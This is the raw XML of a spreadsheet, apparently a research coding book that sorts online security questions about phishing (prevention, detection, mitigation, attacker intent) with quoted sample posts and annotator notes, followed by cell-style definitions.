 &lt;p&gt;I keep hearing the use of "consequences" of not taking the training seriously, but I feel as though that is not the best course of action. My question here would be, &lt;strong&gt;what are your suggestions to improve the effectiveness of the training and keeping the audience (the end-user) with a true willingness to pay full attention to the training?&lt;/strong&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>Tracking click-through for organization-wide phishing email test</t>
  </si>
  <si>
    <t>&lt;p&gt;My organization wants to send out a test phishing email to all employees after a week of security awareness.&lt;/p&gt;
 &lt;p&gt;I plan on drafting a basic HTML page and including a misspelled link to it in an email with spoofed headers and intentionally incorrect email addresses to see if employees are wary enough to click or not.&lt;/p&gt;
 &lt;p&gt;I was also planning on embedding IP tracker URLs to track if employees actually clicked the links or not.&lt;/p&gt;
 &lt;p&gt;Is there a way I can track individual users who click links by attaching their email address to a list?&lt;/p&gt;
 &lt;p&gt;I originally was planning on using a basic free IP-logger online such as &lt;a href="https://grabify.link/" rel="nofollow noreferrer"&gt;https://grabify.link/&lt;/a&gt; or &lt;a href="https://blasze.com/" rel="nofollow noreferrer"&gt;https://blasze.com/&lt;/a&gt;, but this will only track specific IPs and log them. I want to ideally track the number of times the link is clicked and, if possible, grab the email address the phishing email was sent to.&lt;/p&gt;
 &lt;p&gt;For example, if john@company.com clicked the link, it would tell me John clicked a link.&lt;/p&gt;
 &lt;p&gt;If alice@company.com clicked the link in my email, it would tell me that Alice opened my link.&lt;/p&gt;
 &lt;p&gt;Any ideas?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Level 1</t>
  </si>
  <si>
    <t>Level 2</t>
  </si>
  <si>
    <t>Level 3</t>
  </si>
  <si>
    <t>Notes</t>
  </si>
  <si>
    <t>Phishing Prevention</t>
  </si>
  <si>
    <t>This has to do with all the defences used to stop phsihing attacks before they occur</t>
  </si>
  <si>
    <t>Raising users awareness to prevent attack</t>
  </si>
  <si>
    <t>How individuals can prevent ATM skimmer</t>
  </si>
  <si>
    <t>Merged based on the codes</t>
  </si>
  <si>
    <t>This has two categories. 1) I have a phishing solution, is it safe/bullet proof? Yes/No questions. Questions on whether a technique is enough or perfect to solve the mentioned problem. 2) Not sure how to apply a technique. How? Discusses the type of technical defences people are tryiong to apply.  (Best practices) we can discuss whether theses are the best practice or not)</t>
  </si>
  <si>
    <t>Limit users number of actions to stop spam</t>
  </si>
  <si>
    <t>12 post</t>
  </si>
  <si>
    <t>Asking about some technicallity</t>
  </si>
  <si>
    <t>Implementing antiphishing key</t>
  </si>
  <si>
    <t>Step by step guide questions</t>
  </si>
  <si>
    <t>More detailed</t>
  </si>
  <si>
    <t>DKIM authenticated email servers</t>
  </si>
  <si>
    <t xml:space="preserve">How to apply DKIM or any other Domain Keys Identified Mail </t>
  </si>
  <si>
    <t xml:space="preserve">I want to allow 'example.com.au' to be authenticated via DKIM </t>
  </si>
  <si>
    <t>There is a code</t>
  </si>
  <si>
    <t>Quota limits</t>
  </si>
  <si>
    <t>Limit user to perform an action a certain number of times in a day"</t>
  </si>
  <si>
    <t>Security against XSS</t>
  </si>
  <si>
    <t>How to avoid GPS spoofing</t>
  </si>
  <si>
    <t>Server-to-server authentication token spoofing.</t>
  </si>
  <si>
    <t>Moving all emails from one sender to junk</t>
  </si>
  <si>
    <t>Mail app owner asks how to allow the user to move all the emails from.one sender to junk box.</t>
  </si>
  <si>
    <t>gmail account to automatically send and receive emails?</t>
  </si>
  <si>
    <t>PRotect QR code from spoofing</t>
  </si>
  <si>
    <t>The Level3 Category should be summarise. most of it should be. Errors and not working technique.</t>
  </si>
  <si>
    <t xml:space="preserve">Isn't Google Safe Browsing enough </t>
  </si>
  <si>
    <t>6 posts</t>
  </si>
  <si>
    <t>In this category, askers usualy ask about the threat model about a specific technique. It differers from the above in that. The above for askers know the techniue, they trust it but they don't know if it is enough to solve a problem or how to apply it.Discuss if a techniaue can be threaten by attackers. It is differenct from the above as the above people already aware of the threat and they already applying the counter measures. Here they don't know if something can be dangreous.Can some one attack this commonoly used security technique?  (differenent from is it safe because those check whether a solution is perfect but here they are challenging commonly used solutions.)</t>
  </si>
  <si>
    <t>7 posts + 2 posts</t>
  </si>
  <si>
    <t>People are already using it, and the asker is challenging it</t>
  </si>
  <si>
    <t>The possibility of having a DNS that spoofs IP addresses</t>
  </si>
  <si>
    <t>Detecting spoofed IP address ( impossible to spoof)</t>
  </si>
  <si>
    <t>Detection or learning about spoofed IP addresses</t>
  </si>
  <si>
    <t>How spammers knew about anew website?</t>
  </si>
  <si>
    <t>When a user register to ir use a new service, then they receive phishing email about that service (It has a name but forgot it)</t>
  </si>
  <si>
    <t>This is when a victim doesn't know how spammers knew about their servers or the service they provide</t>
  </si>
  <si>
    <t>I have recently noticed that within a few minutes of installing a WordPress site I am receiving the typical 'we can help you gina more visitors' spam messages.</t>
  </si>
  <si>
    <t>Spoofing SSH connection (handshake)</t>
  </si>
  <si>
    <t>Based on my understanding, it is not possible. see link https://security.stackexchange.com/questions/61580/can-an-ssh-server-fingerprint-be-spoofed</t>
  </si>
  <si>
    <t>&lt;p&gt;How do spam or phishing filters treat emails from domains without MX records? If they are checking DNS for SPF/DKIM/DMARC, certainly they also check for MX and score the incoming email appropriately. Do they?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Danger of email address appearance on websites?</t>
  </si>
  <si>
    <t>Spoofed Bank cards</t>
  </si>
  <si>
    <t>Merge with is there securite</t>
  </si>
  <si>
    <t xml:space="preserve">Daily practices of users can be used against them. What kind of practices people are worried that it may attract phishers changed from worring practices </t>
  </si>
  <si>
    <t xml:space="preserve">When a user log into their account, they are sent to a CAS page with different URL to type in their credentials </t>
  </si>
  <si>
    <t>2 posts, merged with best practices</t>
  </si>
  <si>
    <t>The information in autoamti reply</t>
  </si>
  <si>
    <t xml:space="preserve">Using forget password to spam users </t>
  </si>
  <si>
    <t>When a spammer sends the user forget password email that is not requested so the user blocks the emails from the legitimate websites?</t>
  </si>
  <si>
    <t>The user is aware that the code has security vulnerabilities allow attackers to attack others. The user mostly either does know where is the vulnerability or how to fix it.</t>
  </si>
  <si>
    <t>SQL injection to send emails to other users</t>
  </si>
  <si>
    <t>The webform has a vulnerability allowing the attacker to send the form to other ussers.</t>
  </si>
  <si>
    <t>4 posts</t>
  </si>
  <si>
    <t>The website comments allow the users to add malware that redirect the user to a phishing website</t>
  </si>
  <si>
    <t>For example, Wordpress vulnerability allow url redirect fusing url path</t>
  </si>
  <si>
    <t>General questions about phsihing and filterings. The type of user is unknown but mostly they are develoeprs with questions on phishing</t>
  </si>
  <si>
    <t>15 posts</t>
  </si>
  <si>
    <t>When there is no code, it's generic, like talking to someone else</t>
  </si>
  <si>
    <t>How detection works?</t>
  </si>
  <si>
    <t>"How"</t>
  </si>
  <si>
    <t>How ad frawd can affect banks?</t>
  </si>
  <si>
    <t>How to prevent online payment fraud</t>
  </si>
  <si>
    <t>Sometimes the OS requests a password ans other times the application itself prompts the password. How to distiguish which service prompts it and how attackers can benifit from them</t>
  </si>
  <si>
    <t>Phishing Detction and reporting</t>
  </si>
  <si>
    <t>This category is to help find phishing attacks on websites, email addresses and so on</t>
  </si>
  <si>
    <t>Users ask whether an email, URL, or call is phishing or not</t>
  </si>
  <si>
    <t>16 posts</t>
  </si>
  <si>
    <t>Attachments with micro code</t>
  </si>
  <si>
    <t>Not sure if this should be here or not</t>
  </si>
  <si>
    <t xml:space="preserve">Reporting websites with typos </t>
  </si>
  <si>
    <t>(probably they are not phishing but for protective reasons)</t>
  </si>
  <si>
    <t>To whom I report  abandoned hacked websites use for intitating phishing attacks?</t>
  </si>
  <si>
    <t>This was block by my filter, is it phishing?</t>
  </si>
  <si>
    <t>allow redirects for unknown website</t>
  </si>
  <si>
    <t>MITM iMessage?</t>
  </si>
  <si>
    <t>This is to set automatic filters to find phishing or spam</t>
  </si>
  <si>
    <t>3 posts</t>
  </si>
  <si>
    <t>Detect Spam in Social media Posts or programming question about a spam filtering library</t>
  </si>
  <si>
    <t>Filtering websites or emails</t>
  </si>
  <si>
    <t>Free dataset</t>
  </si>
  <si>
    <t>Detecting SSID spoofing</t>
  </si>
  <si>
    <t>Detecting unicode in webforms.</t>
  </si>
  <si>
    <t>query Spamhaus's SBL</t>
  </si>
  <si>
    <t>Developers don't know why their system got blocked or marked as phishing. They would usually recive a warning (What is the best practice). The system treats you as an attacker because you did something wrong.</t>
  </si>
  <si>
    <t>Cannot receive forms' content on some mail domains.</t>
  </si>
  <si>
    <t>Examples: Detect instgram posts to not to add htem to a website, Github page marked as phishing, Detect instgram posts to not to add htem to a website</t>
  </si>
  <si>
    <t>Legit emails are not recived through some mail servers</t>
  </si>
  <si>
    <t>Emails marked Deferred, am I blacklisted?</t>
  </si>
  <si>
    <t xml:space="preserve"> This when emails trapped first in a quarntined before they are sent. </t>
  </si>
  <si>
    <t>Dealing with phishing reporter</t>
  </si>
  <si>
    <t>Dealing with reporters and people who ask for phishing detection</t>
  </si>
  <si>
    <t>How to explain why a phishing email slip through filters</t>
  </si>
  <si>
    <t>Removed</t>
  </si>
  <si>
    <t>Phishing Mitagation or post attack</t>
  </si>
  <si>
    <t>This stage comes after detecting phishing attacks.  For example, how to stop an ongoing one</t>
  </si>
  <si>
    <t>This when an experts use tools and securoty analysis methods to trace and invisitigate phishing. They already know this is phishing email</t>
  </si>
  <si>
    <t>18 posts</t>
  </si>
  <si>
    <t>Tracking domains with same owner</t>
  </si>
  <si>
    <t>Spoofed phone number</t>
  </si>
  <si>
    <t>This when people recive a call from you but you are not the one who called</t>
  </si>
  <si>
    <t>This should be " Understanding why attacxkers follow a specific strategy"</t>
  </si>
  <si>
    <t>Reasons for email manipulation</t>
  </si>
  <si>
    <t>Tracking how attacker gained access to more accounts</t>
  </si>
  <si>
    <t>This category concern the measures a user applies to stop the phishing attack but they do not work as expected. Changed from Dwaling with onging attak to. Failing to deal with ongoing attack</t>
  </si>
  <si>
    <t>Cannot stop web forms spam</t>
  </si>
  <si>
    <t>It is more for spam, but we will keep it for now and decide on it later. Phishing Attempt through web forms, Not sure if this is prevention or mitagation because many aspects go under it</t>
  </si>
  <si>
    <t>The user owns a domain but they receive emails impersonating their domain but with accounts do not exist.</t>
  </si>
  <si>
    <t>Falling for a series of attacks</t>
  </si>
  <si>
    <t>I found several cases where victim tries to mitigate the attack by falling for another attck.  Crypto Currency Scam Recovery Scam</t>
  </si>
  <si>
    <t>Concerns the questions individuals asl for how to mitigate the problem. such as changing the password or ask the bank for a compensation.</t>
  </si>
  <si>
    <t>8 posts</t>
  </si>
  <si>
    <t>this and the one below maybe the same</t>
  </si>
  <si>
    <t>Can we use scam recovery busness?</t>
  </si>
  <si>
    <t>Example is the Crypto Currency Scam Recovery Scam. Are Bitcoin Scam Recovery business a scam?</t>
  </si>
  <si>
    <t>Cyber bullying, attcker knows my data</t>
  </si>
  <si>
    <t>How to prove the impersonation to evade legal consequences.</t>
  </si>
  <si>
    <t>Individual was impersonated based on a stolen card</t>
  </si>
  <si>
    <t>How a phishing attack impact a brand reputation after registeration</t>
  </si>
  <si>
    <t xml:space="preserve"> threatining the user to use his data</t>
  </si>
  <si>
    <t>Windows unique identifier. What is it?</t>
  </si>
  <si>
    <t>Not sure about this? should we have a code level 1 fo</t>
  </si>
  <si>
    <t>We don't know the intention behind the questions</t>
  </si>
  <si>
    <t>The user asks for ways for excuting spoofing (may be not for phishing reasons). details about a spoofing technique</t>
  </si>
  <si>
    <t>Learning how to spoof Send http requests from other devices in the local network</t>
  </si>
  <si>
    <t>This category was  'Send http requests from other devices in the local network' MAc address can be spoofed on the sam machine, but the user plans to spoof another machine</t>
  </si>
  <si>
    <t>A way to send legit email to spam</t>
  </si>
  <si>
    <t>Aiming to make a good use of local devices bandwidth</t>
  </si>
  <si>
    <t>Preventing refferal url from appearing</t>
  </si>
  <si>
    <t>|Sometimes you want to say you sent the email but no one recivied it because it went to their junk box</t>
  </si>
  <si>
    <t>Developing a spam bot?</t>
  </si>
  <si>
    <t>Trying to test phishing websites on local servers</t>
  </si>
  <si>
    <t>Spoofing caller ID</t>
  </si>
  <si>
    <t>Hacking bluetooth</t>
  </si>
  <si>
    <t>Hmm, they discuss why it is easy to spoof but hard to detect?</t>
  </si>
  <si>
    <t>Available techniques used to test whether an attack is successful or not</t>
  </si>
  <si>
    <t>Added - Why phishing on local host is not detected category to this. when you click on a link, usually the website you visit knows from which website you came. Here they want to hide it</t>
  </si>
  <si>
    <t xml:space="preserve">Merged with Planning </t>
  </si>
  <si>
    <t>CodeL1</t>
  </si>
  <si>
    <t>Description</t>
  </si>
  <si>
    <t>CodeL2</t>
  </si>
  <si>
    <t>CodeL3</t>
  </si>
  <si>
    <t>Sample quote</t>
  </si>
  <si>
    <t>Note</t>
  </si>
  <si>
    <t xml:space="preserve">Decision </t>
  </si>
  <si>
    <t>Suggested Code Book</t>
  </si>
  <si>
    <t>I want to remove code level 3- it makes  our task complicated. Therefore, I split the code level 2 into more accurate categories. No, we need the Level3</t>
  </si>
  <si>
    <t>Finding a way for individuals to prevent attack</t>
  </si>
  <si>
    <t>Educating End users</t>
  </si>
  <si>
    <t>I have a phishing solution, is it safe/bullet proof?</t>
  </si>
  <si>
    <t>Not sure how to apply a technique</t>
  </si>
  <si>
    <t>learning about phishing basics</t>
  </si>
  <si>
    <t>Questions on whether a technique is enough or perfect to solve the mentioned problem.</t>
  </si>
  <si>
    <t>Changed codeL2 from Applying technical defences to .. Changed description from Discusses the type of technical defences people are tryiong to apply.  (Best practices) we can discuss whether theses are the best practice or not)</t>
  </si>
  <si>
    <t>Understanding how filtering works</t>
  </si>
  <si>
    <t>Yes/No questions</t>
  </si>
  <si>
    <t>General questions</t>
  </si>
  <si>
    <t>Moved to Knowledge gap and changed to learning about phishing basics</t>
  </si>
  <si>
    <t xml:space="preserve">I want to know if this security technique can be hacked (thret model). </t>
  </si>
  <si>
    <t>Assessing the vulnerability of a security technique (threat model)</t>
  </si>
  <si>
    <t xml:space="preserve">Can this legitimate practice brings up an attack? </t>
  </si>
  <si>
    <t>how to prevent others misuse my code for phishing</t>
  </si>
  <si>
    <t>Encryption to avoid impersonation</t>
  </si>
  <si>
    <t>Is it phishing? Human askers</t>
  </si>
  <si>
    <t>Is it phishing? Computer detection</t>
  </si>
  <si>
    <t>How a human report phishing</t>
  </si>
  <si>
    <t>How to automatically report phishing</t>
  </si>
  <si>
    <t>Security against against XSS</t>
  </si>
  <si>
    <t>Failing to deal with ongoing attack</t>
  </si>
  <si>
    <t xml:space="preserve"> GPS spoofing</t>
  </si>
  <si>
    <t xml:space="preserve">Technical tracking and tracing of phishers </t>
  </si>
  <si>
    <t xml:space="preserve">Added to split the code above into two categories based on the type of question </t>
  </si>
  <si>
    <t>Understanding the attack impact based on the victim reaction</t>
  </si>
  <si>
    <t>How?</t>
  </si>
  <si>
    <t>Do not know the threat model of a technique</t>
  </si>
  <si>
    <t>Discuss if a techniaue can be threaten by attackers. It is differenct from the above as the above people already aware of the threat and they already applying the counter measures. Here they don't know if something can be dangreous.</t>
  </si>
  <si>
    <t>Can we merge this with the knowledge gap?</t>
  </si>
  <si>
    <t>Security issues with best practices, commonly used practices</t>
  </si>
  <si>
    <t>The cases of applying phishing attacks</t>
  </si>
  <si>
    <t>how to avoid from getting flagged as spam?</t>
  </si>
  <si>
    <t>Can some one attack this commonoly used security technique?  (differenent from is it safe because those check whether a solution is perfect but here they are challenging commonly used solutions.)</t>
  </si>
  <si>
    <t>What kind of practices people are worried that it may attract phishers</t>
  </si>
  <si>
    <t xml:space="preserve">Changed worring practices </t>
  </si>
  <si>
    <t>Daily practices of users can be used against them</t>
  </si>
  <si>
    <t>unauthorised URL redirect</t>
  </si>
  <si>
    <t xml:space="preserve">Changed System Vulnerability allows phishing attacks to </t>
  </si>
  <si>
    <t>Knowledge gap</t>
  </si>
  <si>
    <t xml:space="preserve">This is too general. I prefer splitting them into several categories: 1) how does filtering work, 2) learning about phishing basics 3) I want to know if this security technique can be hacked (threat model). 4) Can this legitimate practice brings up an attack? </t>
  </si>
  <si>
    <t xml:space="preserve">Remove. </t>
  </si>
  <si>
    <t>MErged with learning about phishing basics</t>
  </si>
  <si>
    <t>Moved to challenging a solution</t>
  </si>
  <si>
    <t>This should be under worrieing practices.</t>
  </si>
  <si>
    <t>Moved to daily practices.</t>
  </si>
  <si>
    <t>Human/Manual detection and reporting</t>
  </si>
  <si>
    <t>Thiss might move to educating users? phishing prevention? Though it happens after the detection.</t>
  </si>
  <si>
    <t>Keep</t>
  </si>
  <si>
    <t>Automatically reporting phishing emails</t>
  </si>
  <si>
    <t>I think we should move it below to computer deteection? as they most of the time overlap.</t>
  </si>
  <si>
    <t>Is it phishing? Computer detection and reporting</t>
  </si>
  <si>
    <t>Automatic detection and reporting</t>
  </si>
  <si>
    <t>Cyber bullying</t>
  </si>
  <si>
    <t>When the attacker uses information about the user to try to td ecive them</t>
  </si>
  <si>
    <t xml:space="preserve">This category should be moved to mitigation? because the user knows it is phishing email. </t>
  </si>
  <si>
    <t>Moved the phishing mitigation</t>
  </si>
  <si>
    <t>Proving a case of impersonation</t>
  </si>
  <si>
    <t>Merge it with How Individuals apply remidiations</t>
  </si>
  <si>
    <t>Technical tracking and tracing of phishers</t>
  </si>
  <si>
    <t>Changing Tracking and understanding of phishers</t>
  </si>
  <si>
    <t>Move to impact --</t>
  </si>
  <si>
    <t>Changed from Dwaling with onging attak to. Failing to deal with ongoing attack</t>
  </si>
  <si>
    <t>Stop web forms spam</t>
  </si>
  <si>
    <t xml:space="preserve">It is more for spam, but we will keep it for now and decide on it later. 
Phishing Attempt through web forms, Not sure if this is prevention or mitagation because many aspects go under it
</t>
  </si>
  <si>
    <t>I found several cases where victim tries to mitigate the attack by falling for another attck. Not sure if this the prevention or the mitagation</t>
  </si>
  <si>
    <t>Crypto Currency Scam Recovery Scam</t>
  </si>
  <si>
    <t>Are Bitcoin Scam Recovery business a scam?</t>
  </si>
  <si>
    <t>Added this but er need to make it different from tracking and undertading phishers.  May be one for experts and the other for novice? hard to diffrentitate.</t>
  </si>
  <si>
    <t>When the user is the attacker either with awareness of the situation or not.</t>
  </si>
  <si>
    <t>This is when developers don't know why their system got blocked or marked as phishing. They would usually recive a warning (What is the best practice). The system treats you as an attacker because you did something wrong.</t>
  </si>
  <si>
    <t>Changed Not follwoing best practices (Why my code isn't working) to Mohammad's code</t>
  </si>
  <si>
    <t xml:space="preserve">Move it to phishing detection. Unexpected detection. </t>
  </si>
  <si>
    <t>The user asks for ways for excuting spoofing (may be not for phishing reasons)</t>
  </si>
  <si>
    <t>Mohammad uses details about a spoofing technique. I think they are somehow different?</t>
  </si>
  <si>
    <t>Irrelevant</t>
  </si>
  <si>
    <t>Robot detection</t>
  </si>
  <si>
    <t>Compromised websites</t>
  </si>
  <si>
    <t>Stopp DDOS attack on phone voice mail</t>
  </si>
  <si>
    <t>unknowing script in wep content developed by open-source Content Management System (CMS)</t>
  </si>
  <si>
    <t xml:space="preserve">Technical spoofing to make code works </t>
  </si>
  <si>
    <t>- not related to phishing</t>
  </si>
  <si>
    <t>Click fraud (ads revinue)</t>
  </si>
  <si>
    <t>recycle unshredded credit card receipts</t>
  </si>
  <si>
    <t>Tracking and blocking website visitors</t>
  </si>
  <si>
    <t>Warning for vulnerable code</t>
  </si>
  <si>
    <t>Spoofed MAC Address</t>
  </si>
  <si>
    <t>Block some methods</t>
  </si>
  <si>
    <t xml:space="preserve">Reboost  Google Analytics </t>
  </si>
  <si>
    <t>Stop DDoS on a server</t>
  </si>
  <si>
    <t>Scraping prevention</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</si>
</sst>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color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="12.0"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
    </font>
    <font>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="12.0"/>
      <color rgb="FFFF0000"/>
      <name val="Calibri"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF1F1F1F"/>
      <name val="&quot;Google Sans&quot;"/>
    </font>
    <font>
      <b/>
      <sz val="12.0"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
    </font>
    <font>
      <sz val="9.0"/>
      <color rgb="FF000000"/>
      <name val="&quot;Google Sans Mono&quot;"/>
    </font>
    <font>
      <b/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <color rgb="FFFF0000"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <color rgb="FF6AA84F"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="9.0"/>
      <color rgb="FF1F1F1F"/>
      <name val="&quot;Google Sans&quot;"/>
    </font>
  </fonts>
  <fills count="15">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="lightGray"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFF3F3F3"/>
        <bgColor rgb="FFF3F3F3"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFF2CC"/>
        <bgColor rgb="FFFFF2CC"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFF9900"/>
        <bgColor rgb="FFFF9900"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF999999"/>
        <bgColor rgb="FF999999"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFF0000"/>
        <bgColor rgb="FFFF0000"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFE5E5E5"/>
        <bgColor rgb="FFE5E5E5"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFB7B7B7"/>
        <bgColor rgb="FFB7B7B7"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFD9EAD3"/>
        <bgColor rgb="FFD9EAD3"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFD9D9D9"/>
        <bgColor rgb="FFD9D9D9"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFFFFF"/>
        <bgColor rgb="FFFFFFFF"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFCCCCCC"/>
        <bgColor rgb="FFCCCCCC"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF00FF00"/>
        <bgColor rgb="FF00FF00"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF00FFFF"/>
        <bgColor rgb="FF00FFFF"/>
      </patternFill>
    </fill>
  </fills>
  <borders count="1">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left" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="3" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFill="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right" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2"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horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right" readingOrder="0" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="4" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="right" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="5" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="right" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="5" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="5" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="5" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="5" fontId="3" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="3" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="3" fontId="3" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="3" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="3" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="3" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" vertical="bottom"/>
    </xf>
    <xf borderId="0" fillId="3" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
